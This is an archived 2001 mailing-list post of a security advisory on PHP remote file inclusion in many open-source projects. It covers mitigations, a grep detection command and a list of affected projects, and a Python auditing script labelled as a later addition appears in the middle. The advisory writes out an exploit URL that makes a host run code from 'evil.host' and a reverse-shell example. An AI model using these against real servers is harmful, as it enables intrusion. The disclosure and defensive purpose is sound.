From: Fred Cohen <fc@all.net>
To: iwar@onelist.com (Information Warfare Mailing List)
Date: Tue, 2 Oct 2001 20:24:48 -0700 (PDT)
Subject: [iwar] [fc:results.of.semi-automatic.source.code.audit]

Subject: results of semi-automatic source code audit

/*
 * results of semi-automatic source code audit of a
 * majority of php based open-source projects registered
 * at Freshmeat.net or Sourceforge.net
 *
 * release date: 2001-10-02
 *
 * authors:
 * atil <bugtraq@jakob.weite-welt.com>
 * genetics <veenstra@chello.nl>
 * #yaht@ircnet, Yet Another Hacker Team
 */

--=[introduction]=--

php comes shipped with two features enabled by default that make
unsuspicious-looking source execute arbitrary code:

- variables passed from the browser are stored in global context
- file-system functions work transparently on URLs

--=[background]=--

These exploits for php are not new, and they are not the fault of php or of
any bug in the php source itself, but of the authors of a large number of
projects written in php. What is new is the extensive audit of a huge number
of projects and the surprisingly large number of vulnerabilities discovered.

--=[our task]=--

We looked for files that are often not accessed directly by the browser but
included from somewhere else, and that contained something like this:

in helperfunction.php:

    include("$includedir/library.php");

If the variable $includedir is not set by something executed before the
include statement, we can override it from the http client with something
like this:

    http://vuln.host/helperfunction.php?includedir=http://evil.host/code

When the script is executed on vuln.host, the php interpreter will fetch the
document http://evil.host/code/library.php and execute it. Breaking into the
system is easy now because you can pass any php source to the vulnerable
system (download binaries, execute code, start reverse shells (e.g. "xterm
-display evil.host:1") ...), and it will be executed by the user running the
web server (mod_php) or by the owner of the virtual host (CGI interpreter).
--=[solution]=--

php is not insecure by default, but it makes insecure programming very easy.
Here are some ways to write safe php code:

- give included php files a filename that is not executed by the web server
- put all included php code outside the docroot (not possible for all users),
  or use file permissions or .htaccess
- use constants (best approach)

  in main.php:

      define("MAINFILE", true);
      define("CONFIGDIR", "/some/path/");
      include('./some_function.inc');

  in some_function.inc:

      if ( !defined("MAINFILE") ) die ("this is an include file!");
      include(CONFIGDIR . "config.inc");

  Global variables set from the client don't interfere with constants; the
  defined() test is not necessary for security.

- use $HTTP_*_VARS and disable global variables from the client

--=[scope]=--

Our audit searched only for vulnerabilities involving include files and can
never be compared to a detailed analysis of a complete project. If your php
project didn't show up on the list below, that doesn't mean you can relax now.
We want to make people working on all these great php projects sensitive to
the fact that using a modern scripting language doesn't make your code safe
by default.

--=[hint for ISPs]=--

If you are an ISP and want to identify possibly exploitable php code on your
web server, use this:

    find -type f -a -name '*.php*' -print0 | xargs -0 grep -l -E '(include|require)(_once)? *\( *"?\$'

The resulting files need further manual inspection...
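As an added example (not the authors' tool and not code from the advisory), the Python script below applies the same include/require-with-variable heuristic as the grep above to PHP source and adds the check the "our task" section states in prose: whether the path variable is assigned earlier in the same file, which is what decides whether a client can override it through global variables. The sample PHP inputs are constructed for the demonstration.

```python
import re

# Same idea as the advisory's grep: include/require(_once), optional "(",
# optional quote, then a variable. The variable name is captured.
INCLUDE_RE = re.compile(r'\b(include|require)(_once)?\s*\(?\s*"?\$(\w+)')

# An earlier assignment ($name = ...) is the condition the advisory gives
# for the include not being overridable from the client; "==" is excluded.
def _assign_re(name):
    return re.compile(r'\$' + re.escape(name) + r'\s*=[^=]')

def audit_php(source):
    """Return (line_no, variable, verdict) for every include/require whose
    path starts with a variable. verdict is 'unassigned' when no earlier
    line assigns the variable (client-controllable when globals come from
    the request), otherwise 'assigned' (still needs manual inspection)."""
    findings = []
    lines = source.splitlines()
    for idx, line in enumerate(lines):
        m = INCLUDE_RE.search(line)
        if not m:
            continue
        var = m.group(3)
        earlier = "\n".join(lines[:idx])
        verdict = "assigned" if _assign_re(var).search(earlier) else "unassigned"
        findings.append((idx + 1, var, verdict))
    return findings

# Constructed sample modelled on the helperfunction.php case in the advisory.
SAMPLE_VULNERABLE = """<?php
// helper functions, normally included from main.php
include("$includedir/library.php");
require_once($libdir . "/db.inc");
?>"""

# Constructed sample where the path variable is set before the include.
SAMPLE_GUARDED = """<?php
$includedir = "/var/www/lib";
include("$includedir/library.php");
?>"""

if __name__ == "__main__":
    for name, src in (("vulnerable", SAMPLE_VULNERABLE), ("guarded", SAMPLE_GUARDED)):
        for line_no, var, verdict in audit_php(src):
            print(f"{name}:{line_no}: ${var} -> {verdict}")
```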
--=[vulnerable projects]=--

(all maintainers have been informed a while ago)

Actionpoll       http://sourceforge.net/projects/actionpoll
AWOL             http://www.freshmeat.net/projects/awol
CCC              http://www.cccsoftware.org
DarkPortal       http://sourceforge.net/projects/darkportal
Empris           http://empris.sourceforge.net
Moregroupware    http://www.moregroupware.org
Phorecast        http://phorecast.org
Phormation       http://www.peaceworks.ca/phormation.php
pSlash           http://www.pslash.com
The Gallery      http://sourceforge.net/projects/gallery
webodex          http://homepage.mac.com/ghorwood/webodex
Zorbstats        http://freshmeat.net/projects/zorbstats
phpAdsNew        http://sourceforge.net/projects/phpadsnew
myphppagetool    http://myphppagetool.sourceforge.net
ActionPoll       http://sourceforge.net/projects/actionpoll
SIPS             http://sips.sourceforge.net
thatware         http://thatware.org

We don't provide the exact vulnerable piece of code, but we secured our
results with at least one machine (mostly the demo site of the project)
where we could execute a phpinfo() script coming from our web server.

cheers
atil & genetics
This archive was generated by hypermail 2.1.2 : 2001-12-31 20:59:53 PST